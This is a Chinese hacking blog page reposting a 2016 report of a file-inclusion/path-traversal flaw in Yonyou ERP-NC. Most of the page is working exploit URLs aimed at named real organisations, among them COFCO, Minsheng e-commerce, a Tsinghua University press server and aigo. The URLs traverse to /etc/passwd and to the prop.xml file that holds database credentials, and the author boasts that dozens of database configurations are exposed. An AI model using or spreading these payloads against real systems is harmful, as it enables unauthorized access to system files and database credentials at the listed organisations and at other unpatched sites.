记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

用友ERP-NC某处通用文件包含漏洞

2016-01-04 14:55

漏洞作者: 管管侠

详细说明:

可以遍历各种系统文件,影响大量知名政校企

漏洞证明:

中粮集团

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

20234909313d7dc530879447c072b5c7ec26cd92[1]

还可以读取默认配置文件

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

下面有中粮几十组数据库配置,数据库群

21000333c6f3280e63a52a08aeb709cfab081f76[1]

民生电商

http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

202349297338333a35354aaed0a68d1c5dd66a4c[1]

数据库配置

http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

2107535869b827e1ffd598d6b256061db7e289c7[1]

清华大学

http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

20234943ef5c445dd2cdabfcb14954325796552b[1]

http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

2107561891038eba483bec7a79ee0eb9c99a2216[1]

爱国者

http://nc.aigo.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

20234955b5ca7f3ee037192e9afb6dd4a7d423d1[1]

以下也都是有效案例

http://nc.bcegc.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

http://oa.tianue.com:8888/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

………

知识来源: 0day5.com/archives/3673

阅读:171158 | 评论:0 | 标签:Others ERP-NC 文件包含 漏洞 用友 通用

想收藏或者和大家分享这篇好文章→复制链接地址

“用友ERP-NC某处通用文件包含漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云

本页关键词